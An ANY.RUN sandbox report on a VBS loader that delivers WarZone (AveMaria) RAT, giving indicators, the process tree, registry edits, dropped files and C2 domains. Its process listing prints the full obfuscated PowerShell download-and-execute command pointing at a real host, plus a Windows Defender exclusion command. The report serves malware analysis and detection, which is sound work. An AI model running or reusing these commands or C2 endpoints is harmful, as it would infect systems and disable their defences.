analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

payload.vbs

Full analysis: https://app.any.run/tasks/68c5297b-cad9-480a-9979-52ad78b3cbaa
Verdict: Malicious activity
Threats:

WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2.

Analysis date: September 30, 2023, 18:10:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
loader
warzone
rat
remote
avemaria
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

EBD8D4466968F9459C1E6CE8D3089371

SHA1:

87CA4C6C2A9F60C3E732345F64A2193726FBBAC0

SHA256:

9EDCA23169D5993D4741088D4615576995EDCB96B6EC2614ADA0FEB8792E3D75

SSDEEP:

1536:WdxPs2Sg7fWmSVpYXclxFkonXBLbicyjTj45:72SSWj5VcjTj45

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Cache.exe (PID: 3380)
      • svchost.exe (PID: 1896)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 3080)
      • Cache.exe (PID: 3380)
    • Changes powershell execution policy (Unrestricted)

      • wscript.exe (PID: 3296)
    • Adds path to the Windows Defender exclusion list

      • svchost.exe (PID: 1896)
    • WARZONE was detected

      • mscorsvw.exe (PID: 2884)
    • Connects to the CnC server

      • mscorsvw.exe (PID: 2884)
    • WARZONE detected by memory dumps

      • mscorsvw.exe (PID: 2884)
    • AVEMARIA was detected

      • mscorsvw.exe (PID: 2884)
  • SUSPICIOUS

    • The Powershell connects to the Internet

      • powershell.exe (PID: 3080)
    • Unusual connection from system programs

      • powershell.exe (PID: 3080)
    • Adds/modifies Windows certificates

      • wscript.exe (PID: 3296)
    • Reads the Internet Settings

      • powershell.exe (PID: 3080)
      • wscript.exe (PID: 3296)
      • svchost.exe (PID: 1896)
    • Powershell scripting: start process

      • wscript.exe (PID: 3296)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3296)
      • svchost.exe (PID: 1896)
    • Probably download files using WebClient

      • wscript.exe (PID: 3296)
    • Starts CMD.EXE for commands execution

      • Cache.exe (PID: 3380)
    • Executing commands from a ".bat" file

      • Cache.exe (PID: 3380)
    • The process creates files with name similar to system file names

      • Cache.exe (PID: 3380)
    • Script adds exclusion path to Windows Defender

      • svchost.exe (PID: 1896)
    • Creates executable files that already exist in Windows

      • Cache.exe (PID: 3380)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 2680)
    • Connects to unusual port

      • mscorsvw.exe (PID: 2884)
  • INFO

    • Checks supported languages

      • Cache.exe (PID: 3380)
      • mscorsvw.exe (PID: 2884)
      • svchost.exe (PID: 1896)
    • Reads the machine GUID from the registry

      • Cache.exe (PID: 3380)
      • svchost.exe (PID: 1896)
      • mscorsvw.exe (PID: 2884)
    • Reads the computer name

      • Cache.exe (PID: 3380)
      • svchost.exe (PID: 1896)
      • mscorsvw.exe (PID: 2884)
    • Create files in a temporary directory

      • Cache.exe (PID: 3380)
    • The executable file from the user directory is run by the Powershell process

      • Cache.exe (PID: 3380)
    • Creates files or folders in the user directory

      • Cache.exe (PID: 3380)
      • mscorsvw.exe (PID: 2884)
    • The executable file from the user directory is run by the CMD process

      • svchost.exe (PID: 1896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

WarZone

(PID) Process(2884) mscorsvw.exe
C2 (2)Superherocan.mywire.org:5200
SuperGuy.camdvr.org:6000
BuildID2ATGDKGAR24
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logTrue
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
9
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start wscript.exe no specs powershell.exe winword.exe no specs cache.exe no specs cmd.exe no specs timeout.exe no specs svchost.exe no specs powershell.exe no specs #WARZONE mscorsvw.exe

Process information

PID
CMD
Path
Indicators
Parent process
3296"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\payload.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3080"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QCyOP($LfxxvIXuk, $nsNHppl){[IO.File]::WriteAllBytes($LfxxvIXuk, $nsNHppl)};function UTgnMckai($LfxxvIXuk){if($LfxxvIXuk.EndsWith((PzWDEgSp @(42681,42735,42743,42743))) -eq $True){Start-Process (PzWDEgSp @(42749,42752,42745,42735,42743,42743,42686,42685,42681,42736,42755,42736)) $LfxxvIXuk}else{Start-Process $LfxxvIXuk}};function oWcFuS($QAGuEuW){$GEWkFQ = New-Object (PzWDEgSp @(42713,42736,42751,42681,42722,42736,42733,42702,42743,42740,42736,42745,42751));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$nsNHppl = $GEWkFQ.DownloadData($QAGuEuW);return $nsNHppl};function PzWDEgSp($DwsEszM){$xAvBHV=42635;$YxQnI=$Null;foreach($GJWJwE in $DwsEszM){$YxQnI+=[char]($GJWJwE-$xAvBHV)};return $YxQnI};function fMxFFYYf(){$fFIONeQho = $env:APPDATA + '\';$KpdLa = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42690,42688,42710,42730,42704,42712,42700,42708,42711,42730,42720,42718,42704,42717,42715,42700,42718,42718,42681,42749,42751,42737));$ZgzkEmW = $fFIONeQho + '75K_EMAIL_USERPASS.rtf';QCyOP $ZgzkEmW $KpdLa;UTgnMckai $ZgzkEmW;;$TobweY = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42702,42732,42734,42739,42736,42681,42736,42755,42736));$pXbEDyNl = $fFIONeQho + 'Cache.exe';QCyOP $pXbEDyNl $TobweY;UTgnMckai $pXbEDyNl;;;}fMxFFYYf;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
308"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\75K_EMAIL_USERPASS.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEpowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
3380"C:\Users\admin\AppData\Roaming\Cache.exe" C:\Users\admin\AppData\Roaming\Cache.exepowershell.exe
User:
admin
Company:
EVAwoHec
Integrity Level:
MEDIUM
Description:
ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo.
Exit code:
0
Version:
7.50.939.23
Modules
Images
c:\users\admin\appdata\roaming\cache.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\mscoree.dll
2680C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.bat""C:\Windows\SysWOW64\cmd.exeCache.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
788timeout 3 C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\user32.dll
1896"C:\Users\admin\AppData\Roaming\svchost.exe" C:\Users\admin\AppData\Roaming\svchost.execmd.exe
User:
admin
Company:
EVAwoHec
Integrity Level:
MEDIUM
Description:
ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo.
Exit code:
0
Version:
7.50.939.23
Modules
Images
c:\users\admin\appdata\roaming\svchost.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\mscoree.dll
3176"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Roaming\svchost.exe" -ForceC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2884"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
.NET Runtime Optimization Service
Version:
4.7.2558.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
WarZone
(PID) Process(2884) mscorsvw.exe
C2 (2)Superherocan.mywire.org:5200
SuperGuy.camdvr.org:6000
BuildID2ATGDKGAR24
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logTrue
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
Total events
5 711
Read events
5 634
Write events
74
Delete events
3

Modification events

(PID) Process:(3296) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3296) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3296) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3296) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3080) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3080) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C7C20953EB5AC83C81CA388170EEC982E577F810
Operation:writeName:Blob
Value:
0200000001000000CC0000001C0000006C00000001000000000000000000000000000000010000007B00340030004100350046004200430032002D0038004600300046002D0034003700320044002D0039004200380041002D003700420032003500300034004300300045004200410038007D00000000004D006900630072006F0073006F0066007400200045006E00680061006E006300650064002000430072007900700074006F0067007200610070006800690063002000500072006F00760069006400650072002000760031002E003000000000001900000001000000100000000FED148DCA9288CFE9E8CFEDE332D41E0F00000001000000200000003940FA3A00F54D92B7F88E2D48C2772C8ABB2A13E49A0D26CD13424C4B551832030000000100000014000000C7C20953EB5AC83C81CA388170EEC982E577F810140000000100000014000000396A962A0D9CA2D65CF53FD9D5915A728280AB8020000000010000004C0300003082034830820230A0030201020209009BC2D79761F68C84300D06092A864886F70D01010B05003039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E79301E170D3230303932383036333030355A170D3330303932363036333030355A3039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100A20B189EC9265492B7621FFE83B82E05923AB02D2DEE3E20C24BB7D8923FA45D5D62E0925DAF5EABBDD7C870E4D1229FF08A2D78D685E81450475802410F692FBBD1DFA12CE5E60EE26583458D949D7C0EDC212A1DCADB4426B6F6C2BE40B90B95BED978CC99FCBE9C00035C8FEE07200B20EA4B86FD3E9FFE42AAD926D2D381CC4C95AF963C3A19A7C90BC1C084F7434A83B0626E41A8E4EB3AC624E5DBB3D3214D535FC45294D746609F6E69B44DA48305DE63BA6FEF283E2778254E8579ABB0295629954E228B18AB5355FEF0F664D9DCD2C4A5047D4879BE8587687E37DE690C4E0D45927B2384E1BF09BE1F2744B50D54D5CD0B1223F5D31A446401D1A90203010001A3533051301D0603551D0E04160414396A962A0D9CA2D65CF53FD9D5915A728280AB80301F0603551D23041830168014396A962A0D9CA2D65CF53FD9D5915A728280AB80300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010089391C5F3A6B3AA5CCD58C62CE4DC5E71A59F014066678C1ECB7959D4F5F5ACDF23E1EAD032ECC41C459B54A991C40E23F546C64C424BF954035D94C0F30EA7172E98E40F5D8A9B389A56360D837BDF5149754095403EE1AC7BE6415DEA18C10E98113868D6BD01C1FCA8A7704AAB167D9BA70D4FBCCC8E1836CC11AF03E8A62E13DB2EBF7038E469ED65D1D46B3074D92BB304F8FF41068DEC4BB499974635A8C524E4DA418B524529C641DBA82918A55FFBC82B8688B0838C3CEB24647B6142CDB17837E3978D7C551803638DE839DC9B2F9B368773E9148364ABEACF9ABB4A20A3D72122F22E3E17F0969B4C8C2CAF88C5B5D74EC82C19FA533D01ADD79A3
(PID) Process:(3080) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C7C20953EB5AC83C81CA388170EEC982E577F810
Operation:writeName:Blob
Value:
040000000100000010000000F7998935234BC4DE2CB672C84BD55034140000000100000014000000396A962A0D9CA2D65CF53FD9D5915A728280AB80030000000100000014000000C7C20953EB5AC83C81CA388170EEC982E577F8100F00000001000000200000003940FA3A00F54D92B7F88E2D48C2772C8ABB2A13E49A0D26CD13424C4B5518321900000001000000100000000FED148DCA9288CFE9E8CFEDE332D41E0200000001000000CC0000001C0000006C00000001000000000000000000000000000000010000007B00340030004100350046004200430032002D0038004600300046002D0034003700320044002D0039004200380041002D003700420032003500300034004300300045004200410038007D00000000004D006900630072006F0073006F0066007400200045006E00680061006E006300650064002000430072007900700074006F0067007200610070006800690063002000500072006F00760069006400650072002000760031002E0030000000000020000000010000004C0300003082034830820230A0030201020209009BC2D79761F68C84300D06092A864886F70D01010B05003039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E79301E170D3230303932383036333030355A170D3330303932363036333030355A3039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100A20B189EC9265492B7621FFE83B82E05923AB02D2DEE3E20C24BB7D8923FA45D5D62E0925DAF5EABBDD7C870E4D1229FF08A2D78D685E81450475802410F692FBBD1DFA12CE5E60EE26583458D949D7C0EDC212A1DCADB4426B6F6C2BE40B90B95BED978CC99FCBE9C00035C8FEE07200B20EA4B86FD3E9FFE42AAD926D2D381CC4C95AF963C3A19A7C90BC1C084F7434A83B0626E41A8E4EB3AC624E5DBB3D3214D535FC45294D746609F6E69B44DA48305DE63BA6FEF283E2778254E8579ABB0295629954E228B18AB5355FEF0F664D9DCD2C4A5047D4879BE8587687E37DE690C4E0D45927B2384E1BF09BE1F2744B50D54D5CD0B1223F5D31A446401D1A90203010001A3533051301D0603551D0E04160414396A962A0D9CA2D65CF53FD9D5915A728280AB80301F0603551D23041830168014396A962A0D9CA2D65CF53FD9D5915A728280AB80300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010089391C5F3A6B3AA5CCD58C62CE4DC5E71A59F014066678C1ECB7959D4F5F5ACDF23E1EAD032ECC41C459B54A991C40E23F546C64C424BF954035D94C0F30EA7172E98E40F5D8A9B389A56360D837BDF5149754095403EE1AC7BE6415DEA18C10E98113868D6BD01C1FCA8A7704AAB167D9BA70D4FBCCC8E1836CC11AF03E8A62E13DB2EBF7038E469ED65D1D46B3074D92BB304F8FF41068DEC4BB499974635A8C524E4DA418B524529C641DBA82918A55FFBC82B8688B0838C3CEB24647B6142CDB17837E3978D7C551803638DE839DC9B2F9B368773E9148364ABEACF9ABB4A20A3D72122F22E3E17F0969B4C8C2CAF88C5B5D74EC82C19FA533D01ADD79A3
(PID) Process:(308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
On
(PID) Process:(308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
On
Executable files
2
Suspicious files
7
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
308WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3BE0.tmp.cvr
MD5:
SHA256:
308WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc
MD5:
SHA256:
308WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0001.doc
MD5:
SHA256:
3176powershell.exeC:\Users\admin\AppData\Local\Temp\vsdf02ho.5r3.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3380Cache.exeC:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.battext
MD5:D76DE334DADD5F50AC32212D9C9E2EE0
SHA256:84D3177F8CD041A09EACE21034542AE0D60F33EEEA9CC1CF9B682CD1D7B9C172
3080powershell.exeC:\Users\admin\AppData\Local\Temp\ssed25bn.rry.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3080powershell.exeC:\Users\admin\AppData\Local\Temp\3mwkonp4.ubs.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3380Cache.exeC:\Users\admin\AppData\Roaming\svchost.exeexecutable
MD5:19FACA8998FC47A4ED790B4C8CBC4E6B
SHA256:86C94E5F96B047700F26F29D0F0ECF7BC76C78883C859E4D26FE4F3E3E00E7AD
3080powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
3176powershell.exeC:\Users\admin\AppData\Local\Temp\jbk2bzqz.5yo.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
www.freecryptorobot.com:443
https://www.freecryptorobot.com/Release/Cache.exe
unknown
executable
1015 Kb
GET
200
www.freecryptorobot.com:443
https://www.freecryptorobot.com/Release/75K_EMAIL_USERPASS.rtf
unknown
text
2.20 Mb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1208
svchost.exe
239.255.255.250:1900
whitelisted
332
svchost.exe
224.0.0.252:5355
unknown
3080
powershell.exe
194.87.14.76:443
www.freecryptorobot.com
HostSlick
CZ
unknown
2884
mscorsvw.exe
185.225.74.106:5200
Superherocan.mywire.org
AS-DC
US
unknown

DNS requests

Domain
IP
Reputation
www.freecryptorobot.com
  • 194.87.14.76
unknown
Superherocan.mywire.org
  • 185.225.74.106
unknown

Threats

PID
Process
Class
Message
332
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.mywire .org Domain
2884
mscorsvw.exe
A Network Trojan was detected
ET MALWARE Warzone RAT Response (Inbound)
17 ETPRO signatures available at the full report
No debug info